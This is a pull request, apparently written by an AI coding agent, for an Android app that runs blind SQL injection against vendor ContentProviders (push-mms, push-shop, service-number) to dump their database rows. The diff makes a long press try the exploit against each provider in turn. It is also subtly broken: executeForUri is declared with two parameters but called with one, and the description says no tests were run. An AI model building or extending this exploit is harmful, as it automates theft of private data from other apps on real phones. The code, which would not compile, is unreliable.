### PR TITLE
Add sequential provider fallback on long press

### DIFF
--- a/app/src/main/java/yuu/xposed/MainActivity.java
+++ b/app/src/main/java/yuu/xposed/MainActivity.java
@@ -37,7 +37,10 @@ import com.hjq.device.compat.DeviceMarketName;
 import com.hjq.device.compat.DeviceOs;
 
 import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.Collections;
 import java.util.HashMap;
+import java.util.List;
 import java.util.Locale;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
@@ -89,12 +92,16 @@ public class MainActivity extends Activity {
          */
         private String sql;
         /**
-         * 目标 ContentProvider 的 URI
+         * 目标 ContentProvider 的 URI 列表
          */
-        private Uri uri;
+        private List<Uri> targetUris;
 
         public ExecQueryAsync(Uri uri, String sql) {
-            this.uri = uri;
+            this(Collections.singletonList(uri), sql);
+        }
+
+        public ExecQueryAsync(List<Uri> uris, String sql) {
+            this.targetUris = uris;
             this.sql = sql;
         }
 
@@ -109,8 +116,23 @@ public class MainActivity extends Activity {
 
         @Override
         protected Void doInBackground(Void... voids) {
+            for (int i = 0; i < targetUris.size(); i++) {
+                Uri targetUri = targetUris.get(i);
+                logFromThread(String.format(Locale.getDefault(), "\n>>> Executing query against %s", targetUri));
+                boolean hasRows = executeForUri(targetUri);
+                if (!hasRows && i < targetUris.size() - 1) {
+                    logFromThread("No rows returned, moving to next provider...");
+                }
+            }
+            return null;
+        }
+
+        private boolean executeForUri(Uri uri, String sql) {
             Uri insUri = null;
+            boolean hasRows = false;
             try {
+                dumpLimit = -1;
+                qTbl = null;
                 // 向 Provider 插入占位行（rowid=999），部分厂商实现里可作为后续注入上下文
                 ContentValues dummyValues = new ContentValues();
                 dummyValues.put("rowid", "999");
@@ -122,7 +144,7 @@ public class MainActivity extends Activity {
                 }
 
                 // 开始按盲注方式获取行数据
-                getRows(uri, sql);
+                hasRows = getRows(uri, sql);
             } catch (Exception e) {
                 // 从线程里写日志，便于观察异常与进度
                 logFromThread("Exception getting row data: " + e.getMessage());
@@ -134,7 +156,7 @@ public class MainActivity extends Activity {
                     Log.i(TAG, "Attempted to clean non-null insert URI with delete: " + res);
                 }
             }
-            return null;
+            return hasRows;
         }
 
         @Override
@@ -145,9 +167,13 @@ public class MainActivity extends Activity {
         }
     }
 
+    private static final List<String> PROVIDER_URIS = Arrays.asList(
+            "content://service-number/service_number",
+            "content://push-mms/push",
+            "content://push-shop/push_shop"
+    );
     private String deviceInfo;
-    private int number;
-    private String uri = "content://service-number/service_number";
+    private String uri = PROVIDER_URIS.get(0);
 
     @Override
     protected void onCreate(Bundle savedInstanceState) {
@@ -164,15 +190,18 @@ public class MainActivity extends Activity {
         deviceInfo = DeviceOs.getOsName() + DeviceOs.getOsVersionName() + " " + DeviceMarketName.getMarketName(this)+" Android "+ Build.VERSION.RELEASE;
         Log.i(TAG, "device: " + deviceInfo);
         triggerSqliBtn.setOnLongClickListener(v -> {
-            number++;
-            if (number % 3 == 1) {
-                uri = "content://push-mms/push";
-            } else if (number % 3 == 2) {
-                uri = "content://push-shop/push_shop";
-            }else {
-                uri = "content://service-number/service_number";
+            String query = sqlTxt.getText().toString().trim();
+            if (query.isEmpty()) {
+                Toast.makeText(getApplicationContext(), "No query entered", Toast.LENGTH_SHORT).show();
+                return true;
             }
-            Toast.makeText(getApplicationContext(), "uri: " + uri, Toast.LENGTH_SHORT).show();
+            ArrayList<Uri> allUris = new ArrayList<>();
+            for (String providerUri : PROVIDER_URIS) {
+                allUris.add(Uri.parse(providerUri));
+            }
+            Toast.makeText(getApplicationContext(), R.string.show_wait_hole, Toast.LENGTH_SHORT).show();
+            new ExecQueryAsync(allUris, query).execute();
+            linkTxt.setVisibility(View.GONE);
             return true;
         });
         triggerSqliBtn.setOnClickListener(v -> {
@@ -273,7 +302,7 @@ public class MainActivity extends Activity {
      * 3) 改写 SELECT 子句，把逗号替换为 "|| '!!' ||" 以便分隔字段；
      * 4) 先 COUNT(*) 取行数，再逐行恢复。
      */
-    private void getRows(Uri uri, String query) {
+    private boolean getRows(Uri uri, String query) {
         QueryParser queryParser = new QueryParser(query);
         if (!queryParser.getCols(null).isEmpty() || queryParser.isWildcard()) {
             int[] limit = queryParser.getLimitOffset();
@@ -289,7 +318,7 @@ public class MainActivity extends Activity {
             }
         } else {
             logFromThread("Failed to parse SQL");
-            return;
+            return false;
         }
 
         if (queryParser.isWildcard() && qTbl != null) {
@@ -301,7 +330,7 @@ public class MainActivity extends Activity {
                 tblCreate = getCreateStatementForTable(uri, qTbl);
                 if (tblCreate == null) {
                     logFromThread("Failed to get CREATE statement");
-                    return;
+                    return false;
                 }
                 tblCreateMap.put(qTbl, tblCreate);
             } else {
@@ -324,7 +353,7 @@ public class MainActivity extends Activity {
                 query = query.replaceFirst("(?i)SELECT\\s+\\*\\s+FROM", "SELECT " + fieldStr + " FROM");
             } else {
                 logFromThread("Failed to get CREATE fields for table: " + qTbl);
-                return;
+                return false;
             }
         }
 
@@ -344,10 +373,14 @@ public class MainActivity extends Activity {
         String[] countRow = getRow(uri, String.format(Locale.getDefault(), "SELECT COUNT(*) FROM (%s)", query), 0);
         if (countRow == null || countRow.length == 0) {
             logFromThread("No rows returned, cannot continue");
-            return;
+            return false;
         } else {
             numRows = Integer.parseInt(countRow[0]);
             logFromThread(String.format(Locale.getDefault(), "Query will return %d row(s)", numRows));
+            if (numRows == 0) {
+                logFromThread("Provider returned zero rows");
+                return false;
+            }
         }
 
         // 逐行导出：按 LIMIT 1 OFFSET N 的方式恢复每一行
@@ -370,6 +403,7 @@ public class MainActivity extends Activity {
         logFromThread("\n" + deviceInfo);
         logFromThread(getString(R.string.hole_finish));
         runOnUiThread(() -> linkTxt.setVisibility(View.VISIBLE));
+        return true;
     }
 
     /**


### PR DESCRIPTION
## Summary
- update the blind SQL execution task to iterate over multiple provider URIs and continue when no rows are returned
- trigger sequential execution of all known provider URIs from the long-press handler to avoid manual retries
- reset query parsing state between provider attempts and stop early when a provider yields zero rows

## Testing
- not run (not requested)


------
https://chatgpt.com/codex/tasks/task_e_68e36fb787e4832c920e1dc6ae1f813d